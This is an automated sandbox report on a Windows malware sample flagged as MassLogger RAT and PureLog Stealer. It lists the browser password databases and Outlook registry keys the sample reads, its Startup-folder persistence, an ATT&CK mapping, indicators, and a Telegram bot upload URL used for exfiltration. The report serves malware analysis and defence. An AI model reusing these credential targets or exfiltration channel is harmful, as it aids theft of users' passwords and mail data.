Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: neophobia.exe	Binary or memory string: WIN_81
Source: neophobia.exe	Binary or memory string: WIN_XP
Source: neophobia.exe	Binary or memory string: WIN_XPe
Source: neophobia.exe	Binary or memory string: WIN_VISTA
Source: neophobia.exe	Binary or memory string: WIN_7
Source: neophobia.exe	Binary or memory string: WIN_8
Source: neophobia.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2664984338.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2664477879.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01006283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_01006283
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01006747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_01006747
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DB6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00DB6283
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DB6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00DB6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
7b4Iaf58Rp.exe	68%	Virustotal		Browse
7b4Iaf58Rp.exe	91%	ReversingLabs	Win32.Trojan.AutoitInject
7b4Iaf58Rp.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\scrolar\neophobia.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\scrolar\neophobia.exe	91%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\scrolar\neophobia.exe	68%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.0000000003210000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029D0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.2664984338.00000000031D8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002959000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2664984338.000000000323C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States		16989	UTMEMUS	false
104.21.80.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588266
Start date and time:	2025-01-10 23:14:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7b4Iaf58Rp.exe renamed because original name is a hash value
Original Sample Name:	fff6c4bcd537790156642c7010aac1fddd2a79f3143a71f5570dc19ab9ba25ba.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@18/8@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 57 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:15:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	CvzLvta2bG.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
checkip.dyndns.com	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
UTMEMUS	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1

Process:	C:\Users\user\Desktop\7b4Iaf58Rp.exe
File Type:	data
Category:	dropped
Size (bytes):	200932
Entropy (8bit):	7.978807839515265
Encrypted:	false
SSDEEP:	3072:5vbT/8z5CL24Lk7j03CJ1k8VXbcTDEjCULY54n4BvCAaunlyY0:KtS297NRXoTATY5hVMAyZ
MD5:	1CA39C02B0B94B192A9E6F1975932480
SHA1:	6BEC7A5F43314457B5BBE22EA942DB101BDDD354
SHA-256:	A8F3DBB9A72A40BD88EC748338DAD5376F6031538C053F6ECE0C1E8E9F8C40D0
SHA-512:	A0F9D2B6E76C0CE55DC2E5AB2DA2EC653C5726F096F91E0B872382696E7AA78DC9A24A554D0C2FA8C7190ED1750712AF2A80E5021CB2DF934883E3382AC0D05F
Malicious:	false
Reputation:	low
Preview:	EA06..4..Dz...VsF.N&5.W".E...J$.c....tY..nk@..N..4..>4......'7.R.#.R.RZ\.GJ.M.IT..5..d...._[..q..j.f......O..'fe%..4...+7.Q....&.f.I-T.d.g....}..$.N#...........g....N..........gV...9 ....jt....?U.....!7..a.Z.M..I.j....'.....u........J.'"..5P.8...t..L.......'.Z..p..k.Y...8...p....i..r..W..BwZ.......OY...}.\En.%.l...Y.j..5.,.....}.I.r}0..%......4w'3.......g3...E%.T+S\...h..(.J.....'\|.P....O.....4Fh.I..4....~..j...M.t9..i...5.q1.M&..,..s..Ug0`....7..C.G.3;5.s].....5_..4....sF.T...T....V.?\V#...~.x\|O.-..T....ka....]T.I.Lk.[>.........0..S.N.h!..........$....M.\|Z.v;4.n......z.c.Uo..w8......"s..q..u..:..........S...u.V..z4....\|m..k.@..&../+...~+.n..c...&3p.....m.;y..SZ.]lT..4..E.....f.L.P.-.u..\c4.Wq.....m.N....T..m".J..1.n.o...X.y.W...~..\.P...>>:q...;..O..q.ry.kk..eU.d.....c....._...\|.,jcX...J...L...Z...o.Nk.Y.........\.;I..(...V...p 1.t.m..W.......u8.j,.c.......U.........G..@a....mP......`....a...`.^.:.5.....zs....];H.....g4J&.d.\x.

C:\Users\user\AppData\Local\Temp\aut5E33.tmp

Download File

Process:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	200932
Entropy (8bit):	7.978807839515265
Encrypted:	false
SSDEEP:	3072:5vbT/8z5CL24Lk7j03CJ1k8VXbcTDEjCULY54n4BvCAaunlyY0:KtS297NRXoTATY5hVMAyZ
MD5:	1CA39C02B0B94B192A9E6F1975932480
SHA1:	6BEC7A5F43314457B5BBE22EA942DB101BDDD354
SHA-256:	A8F3DBB9A72A40BD88EC748338DAD5376F6031538C053F6ECE0C1E8E9F8C40D0
SHA-512:	A0F9D2B6E76C0CE55DC2E5AB2DA2EC653C5726F096F91E0B872382696E7AA78DC9A24A554D0C2FA8C7190ED1750712AF2A80E5021CB2DF934883E3382AC0D05F
Malicious:	false
Reputation:	low
